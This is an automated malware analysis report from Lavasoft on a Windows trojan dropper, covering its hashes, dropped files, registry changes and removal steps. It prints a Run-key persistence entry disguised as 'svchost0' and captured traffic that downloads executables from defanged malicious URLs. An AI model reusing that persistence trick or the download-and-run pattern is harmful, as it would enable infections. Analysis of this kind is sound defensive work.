Gen.Variant.Zusy.224016_0e79a1d33e
Trojan.Win32.Agent.nezazd (Kaspersky), Gen:Variant.Zusy.224016 (AdAware), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: 0e79a1d33eb1d2beb44de83b00383f78
SHA1: 9a90b617307c1b4ec117d5d3a862bf227958d9e3
SHA256: aa0e234b7b43495cd2272d403f78bc60194c3219e1ecf861d1f28cf036a62624
SSDeep: 12288:7XwOrReFWQFe6hErRivAk/IpImWpzTXyVhRElM5VsA:7XwOrRsiMErRivAJSWVhWcVh
Size: 463415 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171, UPolyXv05_v6
Company: no certificate found
Created at: 2012-12-31 02:38:51
Analyzed on: Windows7 SP1 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
setup.exe:4040
uc.exe:3972
Bind.exe:3680
%original file name%.exe:3844
setup.tmp:3412
The Trojan injects its code into the following process(es):
No processes have been created.
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process setup.exe:4040 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UH8JC.tmp\setup.tmp (1423 bytes)
The Trojan deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UH8JC.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UH8JC.tmp\setup.tmp (0 bytes)
The process Bind.exe:3680 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Browser_V6.0.1471.913_r_4728_(Build1702151518).exe (1471609 bytes)
The process %original file name%.exe:3844 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7ZipSfx.000\setup.exe (1288 bytes)
The Trojan deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7ZipSfx.000\setup.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7ZipSfx.000 (0 bytes)
The process setup.tmp:3412 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\fff\unins000.dat (1376 bytes)
%Program Files%\fff\fff.ini (25 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-N0E1M.tmp\_isetup\_shfoldr.dll (47 bytes)
%Program Files%\fff\Bind.exe (73 bytes)
%Program Files%\fff\is-HK0TD.tmp (23961 bytes)
%Program Files%\fff\is-HIE46.tmp (673 bytes)
%Program Files%\fff\uc.exe (192 bytes)
%Program Files%\fff\is-6T2JC.tmp (601 bytes)
The Trojan deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-N0E1M.tmp\_isetup (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-N0E1M.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-N0E1M.tmp\_isetup\_shfoldr.dll (0 bytes)
Registry activity
The process uc.exe:3972 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
To run itself automatically each time Windows boots, the Trojan adds a link to its file under the following system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"svchost0" = "%Program Files%\fff\uc.exe"
The process Bind.exe:3680 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadDecisionTime" = "80 5D F8 EC 75 9D D2 01"
"WpadDecisionReason" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASMANCS]
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad]
"WpadLastNetwork" = "{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecision" = "3"
[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASMANCS]
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadDecision" = "3"
[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASAPI32]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadNetworkName" = "Network 2"
[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecisionTime" = "80 5D F8 EC 75 9D D2 01"
[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 38 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 0A 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecisionReason" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASAPI32]
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASMANCS]
"MaxFileSize" = "1048576"
"EnableFileTracing" = "0"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
The process %original file name%.exe:3844 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process setup.tmp:3412 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\RestartManager\Session0000]
"Sequence" = "1"
"RegFilesHash" = "68 EB 27 85 4B 4C 47 E0 DF 55 83 6F 1B A4 1C D0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\RestartManager\Session0000]
"RegFiles0000" = "%Program Files%\fff\uc.exe, %Program Files%\fff\Bind.exe"
"SessionHash" = "A0 8F 16 97 54 36 AE EC A6 2F 93 7D AC 26 C8 7E"
"Owner" = "54 0D 00 00 BA 9D 21 E7 75 9D D2 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
The Trojan deletes the following registry key(s):
[HKCU\Software\Microsoft\RestartManager\Session0000]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\RestartManager\Session0000]
"RegFilesHash"
"Sequence"
"RegFiles0000"
"SessionHash"
"Owner"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
Dropped PE files
| MD5 | File path |
|---|---|
| ec58caa0cb658e8958ece2811583c6c0 | c:\Program Files\fff\Bind.exe |
| 82e42e2a674a2d98e8688ef29696fdb4 | c:\Program Files\fff\uc.exe |
| f13f028e99888a77e21c721961101339 | c:\Program Files\fff\unins000.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name: Oleg N. Scherbakov
Product Name: 7-Zip SFX
Product Version: 1.6.0.2712
Legal Copyright: Copyright (c) 2005-2012 Oleg N. Scherbakov
Legal Trademarks:
Original Filename: 7ZSfxMod_x86.exe
Internal Name: 7ZSfxMod
File Version: 1.6.0.2712
File Description: 7z Setup SFX (x86)
Comments:
Language: Language Neutral
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 101854 | 101888 | 4.62608 | 0c04e49d78a3c453186c916e6f29540d |
| .rdata | 106496 | 15306 | 15360 | 3.96022 | 1eff757b36a6b7a599236ac8b1b35b4d |
| .data | 122880 | 19948 | 2560 | 3.08518 | 21d5c7a8ba54658b1e07909bf1045c79 |
| .rsrc | 143360 | 6124 | 6144 | 2.63104 | 6cfc1356822af5f0acc53b008cf23f9b |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 1
5a212666f160fc40508f1bb3da9a0e4e
URLs
| URL | IP |
|---|---|
| hxxp://www.guoneizhu.com/ucni.txt | |
| hxxp://www.guoneizhu.com/Browser_V6.0.1471.913_r_4728_(Build1702151518).exe | |
| teredo.ipv6.microsoft.com | |
| dns.msftncsi.com | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY PE EXE or DLL Windows file download HTTP
ET MALWARE Possible Windows executable sent when remote host claims to send a Text File
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
Traffic
GET /ucni.txt HTTP/1.1
Accept: */*
Accept-Language: zh-cn
User-Agent: wget
Host: VVV.guoneizhu.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 13 Mar 2017 11:20:02 GMT
Accept-Ranges: bytes
ETag: "d5a67fc2eb9bd21:0"
Server: Microsoft-IIS/10.0
Date: Wed, 15 Mar 2017 10:21:03 GMT
Content-Length: 334

hXXp://VVV.guoneizhu.com/Browser_V6.0.1471.913_r_4728_(Build1702151518).exe Browser_V6.0.1471.913_r_4728_(Build1702151518).exe
hXXp://VVV.guoneizhu.com/FlowSpritSetup_slnt_5011.exe FlowSpritSetup_slnt_5011.exe
hXXps://res05.bignox.com/s3group/M00/2017/1/16/c9ce6fdbe0c8474580a2ed9c3688c372.exe c9ce6fdbe0c8474580a2ed9c3688c372.exe
GET /Browser_V6.0.1471.913_r_4728_(Build1702151518).exe HTTP/1.1
Accept: */*
Accept-Language: zh-cn
User-Agent: wget
Host: VVV.guoneizhu.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Tue, 21 Feb 2017 14:15:23 GMT
Accept-Ranges: bytes
ETag: "6f2ddcf04c8cd21:0"
Server: Microsoft-IIS/10.0
Date: Wed, 15 Mar 2017 10:21:04 GMT
Content-Length: 51179792
The Trojan connects to the servers at the following location(s):
.text
`.rdata
@.data
.rsrc
__MSVCRT_HEAP_SELECT
user32.dll
KERNEL32.dll
USER32.dll
RegCloseKey
RegOpenKeyExW
RegDeleteKeyW
RegCreateKeyW
RegOpenKeyW
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
COMCTL32.dll
GetCPInfo
%s\*.*
%s\%s
@.reloc
GetProcessWindowStation
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
%Program Files%\fff\uc.exe
<assemblyIdentity version="9.4.3.2"
<requestedExecutionLevel
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\2345Explorer
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\2345Explorer
%USERPROFILE%\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\2345
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
\aa.lnk
Chrome_WidgetWin_1
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\
C:\Users\Public\Desktop\
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC1}_is1%s\Internet Explorer\iexplore.exe
http\shell\open\command
qqbrowser.exe
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
%USERPROFILE%\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\UC
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\UCBrowser
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\UCBrowser
%s\UCBrowser.exe
mscoree.dll
@KERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
index.dat
%Program Files% (x86)\UCBrowser\Application\UCBrowser.exe
%Program Files% (x86)\2345Soft\2345Explorer\2345Explorer.exe
%Program Files% (x86)\KuaiZip\X86\KuaiZip.exe
%Program Files% (x86)\IQIYI Video\LStyle\5.3.21.2676\QyClient.exe
%Program Files% (x86)\LuDaShi\ComputerZ_CN.exe
%Program Files% (x86)\YouKu\YoukuClient\YoukuDesktop.exe
InstallerSuccessLaunchCmdLine
Software\Microsoft\Windows\CurrentVersion\Run
\UUC0789.exe
uc.exe
1, 0, 0, 1
Bind.exe_3680:
.text
`.rdata
@.data
.rsrc
__MSVCRT_HEAP_SELECT
user32.dll
KERNEL32.dll
USER32.dll
ShellExecuteA
SHELL32.dll
InternetOpenUrlA
HttpQueryInfoA
WININET.dll
GetCPInfo
GET%sHTTP/1.1
Range: bytes=%d-
%Program Files%\fff\Bind.exe
Bind.exe
1, 0, 0, 1
msctls_hotkey32
HotKey1
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
setup.exe:4040
uc.exe:3972
Bind.exe:3680
%original file name%.exe:3844
setup.tmp:3412
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UH8JC.tmp\setup.tmp (1423 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Browser_V6.0.1471.913_r_4728_(Build1702151518).exe (1471609 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7ZipSfx.000\setup.exe (1288 bytes)
%Program Files%\fff\unins000.dat (1376 bytes)
%Program Files%\fff\fff.ini (25 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-N0E1M.tmp\_isetup\_shfoldr.dll (47 bytes)
%Program Files%\fff\Bind.exe (73 bytes)
%Program Files%\fff\is-HK0TD.tmp (23961 bytes)
%Program Files%\fff\is-HIE46.tmp (673 bytes)
%Program Files%\fff\uc.exe (192 bytes)
%Program Files%\fff\is-6T2JC.tmp (601 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"svchost0" = "%Program Files%\fff\uc.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.